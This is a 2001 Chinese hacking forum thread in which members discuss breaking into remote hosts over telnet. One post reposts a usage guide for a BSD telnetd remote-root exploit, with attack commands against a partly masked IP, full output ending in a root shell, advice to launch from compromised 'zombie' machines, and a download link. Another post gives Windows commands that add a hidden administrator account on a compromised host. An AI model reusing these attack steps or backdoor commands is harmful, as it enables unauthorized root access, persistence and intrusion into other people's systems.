作者
|
标题: TELNET的侵入!!!
|
风狼
未注册
|
| |
你好: 我用了TELNET的命令了,不过是看到了一个文本那个文本是不是能得到密码那?我应怎么做那??
| |
IP: 已记录
|
|
|
瑞火
未注册
|
| |
> 7/24红客联盟网站存放的虚拟主机被黑, > 真正的原因是*bsd的telnetd远程溢出漏洞。 > > 受影响的系统有: > BSDI BSD/OS 4.0.1 > BSDI BSD/OS 4.0 > FreeBSD FreeBSD 5.0 > FreeBSD FreeBSD 4.3 > FreeBSD FreeBSD 4.2 > FreeBSD FreeBSD 4.1.1 > FreeBSD FreeBSD 4.1 > FreeBSD FreeBSD 4.0 > FreeBSD FreeBSD 3.x > FreeBSD FreeBSD 2.x > NetBSD NetBSD 1.5.1 > NetBSD NetBSD 1.5 > NetBSD NetBSD 1.4.3 > NetBSD NetBSD 1.4.2 > NetBSD NetBSD 1.4.1 > NetBSD NetBSD 1.4 > NetBSD NetBSD 1.3.3 > NetBSD NetBSD 1.3.2 > NetBSD NetBSD 1.3.1 > NetBSD NetBSD 1.3 > NetBSD NetBSD 1.2.1 > NetBSD NetBSD 1.2 > NetBSD NetBSD 1.1 > NetBSD NetBSD 1.0 > Netkit Linux Netkit 0.12 > Netkit Linux Netkit 0.11 > Netkit Linux Netkit 0.10 > OpenBSD OpenBSD 2.8 > OpenBSD OpenBSD 2.7 > OpenBSD OpenBSD 2.6 > OpenBSD OpenBSD 2.5 > OpenBSD OpenBSD 2.4 > OpenBSD OpenBSD 2.3 > OpenBSD OpenBSD 2.2 > OpenBSD OpenBSD 2.1 > OpenBSD OpenBSD 2.0 > SGI IRIX 6.5 > Sun Solaris 8.0 > Sun Solaris 7.0 > Sun Solaris 2.6 > > 或许将发现更多系统受这个漏洞的影响。 > > 网上现在已经流传了一份exploit.是针对*bsd的, > tested: FreeBSD 3.1, 4.0-REL, 4.2-REL, 4.3-BETA, 4.3-STABLE, 4.3-RELEASE > NetBSD 1.5 > BSDI BSD/OS 4.1 > 我现在编译了它,使它能够在windows下运行。 > > 使用方法为: > 1.把包里的文件解压到同一个目录 > > 2.运行bsd.exe查看运行选项。 > ==================================================== > + Compiled by http://www.cnhonker.com lion + > + Have a goodluck! + > ==================================================== > > 7350854 - x86/bsd telnetd remote root > by zip, lorian, smiler and scut. > > usage: bsd [-n <num>] [-c] [-f] <ip> > > -n num number of populators, for testing purposes > -c check exploitability only, do not exploit > -f force mode, override check results > > WARNING: this is no easy exploit, we have to get things tightly aligned and > send 16/34mb of traffic to the remote telnet daemon. it might not be able to > take that, or it will take very long for it (> 1h). beware. > > tested: FreeBSD 3.1, 4.0-REL, 4.2-REL, 4.3-BETA, 4.3-STABLE, 4.3-RELEASE > NetBSD 1.5 > BSDI BSD/OS 4.1 > > > C:\> > > 3.测试目标主机是否有telnetd漏洞 > C:\>bsd -c 202.108.*.* > ==================================================== > + Compiled by http://www.cnhonker.com lion + > + Have a goodluck! + > ==================================================== > > 7350854 - x86/bsd telnetd remote root > by zip, lorian, smiler and scut. > > check: PASSED, using 16mb mode > > 4. 对目标系统进行攻击 > C:\>bsd -f 202.108.*.* > ==================================================== > + Compiled by http://www.cnhonker.com lion + > + Have a goodluck! + > ==================================================== > > 7350854 - x86/bsd telnetd remote root > by zip, lorian, smiler and scut. > > check: PASSED, using 16mb mode > > ############################################################################# > > ok baby, times are rough, we send 16mb traffic to the remote > telnet daemon process, it will spill badly. but then, there is no > other way, sorry... > > ## setting populators to populate heap address space > ## number of setenvs (dots / network): 31500 > ## number of walks (percentage / cpu): 496140750 > ## > ## the percentage is more realistic than the dots ![](http://www.20cn.com/ubb/smilies/wink.gif) > percent |--------------------------------------------------------| ETA | > 99.37% |....................................................... | 00:00:00 | > > ## sleeping for 10 seconds to let the process recover > ## ok, you should now have a root shell > ## as always, after hard times, there is a reward... > > > command: ?id > uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), > 20(staff), 31(guest) > uname -a > FreeBSD ***.***.com 3.5.1-RELEASE FreeBSD 3.5.1-RELEASE #0: Tue Oct 31 20:05:46 > CST 2000 ding@***.***.com :/usr/src/sys/compile/DING i386 > > > 成功溢出! > > 5.因为这个exploit溢出一台机器需要发送16M的数据包,请大家换带宽高的肉鸡运行,并耐 > 心等候几分钟。请大家使用前用-c选项对目标系统进行测试。如果显示check: PASSED, using > 16mb mode表示有这个漏洞,否则显示FAILED. > > 6.请正确使用本程序,任何非法入侵与本人无关。by: lion 2001/7/27 下载地址: http://home.dqt.com.cn/~safeinfo/bsdhacking.zip 请谨慎使用,禁止对国内站点,进行工具使用测试!
[被 瑞火 编辑过(日期 07-30-2001)]
| |
IP: 已记录
|
|
|
风狼
未注册
|
| |
你好: 你的这个方法我知道!!那个软件我也有,我说的是不用这种软件,我能登陆他的主机,不过我在他的机器里就没有办法得到他的密码!能说一下比较好的方法吗? 谢谢!! 为我们的目标开始努力,建立我们自己的数字化队!! 兵团!! 没有不可能的事! 没有不可能完成的任务! 我一直在努力!
| |
IP: 已记录
|
|
|
网络之隼
未注册
|
| |
楼上是朋友,如果你登陆有system权限的话,你可以自己创建一个用户,并加入administrators 你就无须破他的密码了net user 用户名 密码 /add net localgroup administrators 用户名 /add
| |
IP: 已记录
|
|
|
|